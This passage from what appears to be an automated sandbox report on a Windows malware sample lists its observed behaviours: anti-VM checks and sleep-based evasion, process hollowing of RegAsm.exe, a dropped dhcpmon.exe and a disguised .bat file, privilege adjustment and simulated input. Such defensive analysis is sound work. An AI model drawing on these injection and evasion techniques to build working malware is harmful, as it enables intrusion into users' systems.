Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}			Jump to behavior
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Window / User API: threadDelayed 6998	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Window / User API: threadDelayed 475	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Window / User API: threadDelayed 523	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Window / User API: threadDelayed 593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Window / User API: foregroundWindowGot 770	Jump to behavior
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Window / User API: threadDelayed 603	Jump to behavior
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Window / User API: threadDelayed 6998	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Window / User API: threadDelayed 475	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Window / User API: threadDelayed 523	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Window / User API: threadDelayed 593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Window / User API: foregroundWindowGot 770	Jump to behavior
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Window / User API: threadDelayed 603	Jump to behavior

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe TID: 4060	Thread sleep count: 6998 > 30	Jump to behavior
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe TID: 4060	Thread sleep time: -69980s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6284	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6256	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6580	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat TID: 6980	Thread sleep count: 603 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 4344	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe TID: 4060	Thread sleep count: 6998 > 30	Jump to behavior
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe TID: 4060	Thread sleep time: -69980s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6284	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6256	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6580	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat TID: 6980	Thread sleep count: 603 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 4344	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Thread sleep count: Count: 6998 delay: -10			Jump to behavior
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Thread sleep count: Count: 6998 delay: -10			Jump to behavior

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A24696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00A24696
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A23D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00A23D4E
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,	0_2_00A2C9C7
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2C93C FindFirstFileW,FindClose,	0_2_00A2C93C
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00A2F200
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00A2F35D
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2F65E FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00A2F65E
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A23A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00A23A2B
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A24696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00A24696
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A23D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00A23D4E
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,	0_2_00A2C9C7
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2C93C FindFirstFileW,FindClose,	0_2_00A2C93C
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00A2F200
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00A2F35D
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2F65E FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00A2F65E
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A23A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00A23A2B
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009E4696 GetFileAttributesW,FindFirstFileW,FindClose,	12_2_009E4696
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	12_2_009E3D4E
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	12_2_009EF200
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	12_2_009EF35D
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009EF65E FindFirstFileW,Sleep,FindNextFileW,FindClose,	12_2_009EF65E
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,	12_2_009EC9C7
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009EC93C FindFirstFileW,FindClose,	12_2_009EC93C
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	12_2_009E3A2B
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009EBF27 FindFirstFileW,FindNextFileW,FindClose,	12_2_009EBF27

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009C4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,		0_2_009C4AFE
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009C4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,		0_2_009C4AFE

Source: RegAsm.exe, 00000001.00000002.516655342.0000000002530000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: RegAsm.exe, 00000001.00000002.516655342.0000000002530000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: RegAsm.exe, 00000001.00000002.516655342.0000000002530000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: RegAsm.exe, 00000001.00000002.516655342.0000000002530000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: RegAsm.exe, 00000001.00000002.516655342.0000000002530000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: RegAsm.exe, 00000001.00000002.516655342.0000000002530000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: RegAsm.exe, 00000001.00000002.516655342.0000000002530000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: RegAsm.exe, 00000001.00000002.516655342.0000000002530000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Process information queried: ProcessInformation			Jump to behavior
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Process information queried: ProcessInformation			Jump to behavior

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A341FD BlockInput,		0_2_00A341FD
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A341FD BlockInput,		0_2_00A341FD

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009C3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,		0_2_009C3B4C
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009C3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,		0_2_009C3B4C

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009F5CCC EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,		0_2_009F5CCC
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009F5CCC EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,		0_2_009F5CCC

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A3C304 LoadLibraryA,GetProcAddress,		0_2_00A3C304
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A3C304 LoadLibraryA,GetProcAddress,		0_2_00A3C304

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_3_040A00BE mov esi, dword ptr fs:[00000030h]	0_3_040A00BE
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_3_040A00BE mov esi, dword ptr fs:[00000030h]	0_3_040A00BE
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_3_040A00BE mov esi, dword ptr fs:[00000030h]	0_3_040A00BE
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_3_040A00BE mov esi, dword ptr fs:[00000030h]	0_3_040A00BE

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A181F7 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,		0_2_00A181F7
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A181F7 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,		0_2_00A181F7

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009EA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_009EA395
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009EA364 SetUnhandledExceptionFilter,	0_2_009EA364
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009EA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_009EA395
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009EA364 SetUnhandledExceptionFilter,	0_2_009EA364
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009AA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_009AA395
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009AA364 SetUnhandledExceptionFilter,	12_2_009AA364

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Memory allocated: page read and write \| page guard			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Memory allocated: page read and write \| page guard			Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000 protect: page execute and read and write			Jump to behavior

Contains functionality to inject code into remote processes

Show sources

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_3_040A00BE CreateProcessW,GetThreadContext,ReadProcessMemory,VirtualAlloc,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,ResumeThread,		0_3_040A00BE
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_3_040A00BE CreateProcessW,GetThreadContext,ReadProcessMemory,VirtualAlloc,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,ResumeThread,		0_3_040A00BE

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 7F3008	Jump to behavior
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 7F3008	Jump to behavior

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A18C93 LogonUserW,		0_2_00A18C93
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A18C93 LogonUserW,		0_2_00A18C93

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009C3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,		0_2_009C3B4C
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009C3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,		0_2_009C3B4C

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009C4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_009C4A35
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009C4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_009C4A35

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A24EF5 mouse_event,		0_2_00A24EF5
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A24EF5 mouse_event,		0_2_00A24EF5

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Jump to behavior
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Jump to behavior
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Jump to behavior
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Jump to behavior

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A181F7 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,		0_2_00A181F7
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A181F7 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,		0_2_00A181F7

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A24C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,		0_2_00A24C03
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A24C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,		0_2_00A24C03

Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, 00000000.00000002.517905709.0000000002890000.00000002.00000001.sdmp, RegAsm.exe, 00000001.00000002.516522932.0000000001020000.00000002.00000001.sdmp	Binary or memory string: uProgram Manager
Source: RegAsm.exe, 00000001.00000002.521170908.0000000002DD9000.00000004.00000001.sdmp	Binary or memory string: Program Manager
